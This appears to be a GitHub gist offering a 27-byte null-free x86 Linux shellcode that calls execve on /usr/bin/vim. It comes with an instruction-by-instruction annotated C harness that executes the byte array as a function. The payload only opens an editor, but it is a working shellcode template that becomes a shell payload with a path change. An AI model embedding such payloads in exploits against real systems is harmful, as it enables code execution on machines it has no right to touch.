Created
July 20, 2014 05:12
-
-
Save 0/b67302de3239dfc736da to your computer and use it in GitHub Desktop.
Revisions
-
0 created this gist
Jul 20, 2014 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,17 @@ # x86 shellcode Back in 2010, I needed some shellcode, so I wrote this. It spawns Vim rather than a shell, so I guess it's technically "vimcode". It is, of course, null-free. There is a commented version in the test file, but here it is in its entirety: ``` \x31\xc0\x31\xc9\x99\x50\x68\x2f\x76\x69\x6d\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xb0\x0b\xcd\x80 ``` ## Usage This is 32-bit shellcode, so if you want to run the test file on x86_64, you'll need multilib GCC: ``` gcc -m32 -o test test.c ``` This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,20 @@ const char shellcode[] = "\x31\xc0" // xor %eax, %eax a = 0 "\x31\xc9" // xor %ecx, %ecx c = 0 (*argv[]) "\x99" // cdq d = 0 (*envp[]) "\x50" // push %eax (push the null-terminated "\x68\x2f\x76\x69\x6d" // push $0x6d69762f string "/usr/bin/vim") "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x68\x2f\x75\x73\x72" // push $0x7273752f "\x89\xe3" // mov %esp, %ebx b = &filename "\xb0\x0b" // mov $0x0b, %al a = 11 (execve) "\xcd\x80"; // int $0x80 syscall int main() { ((void (*)()) shellcode)(); return 0; }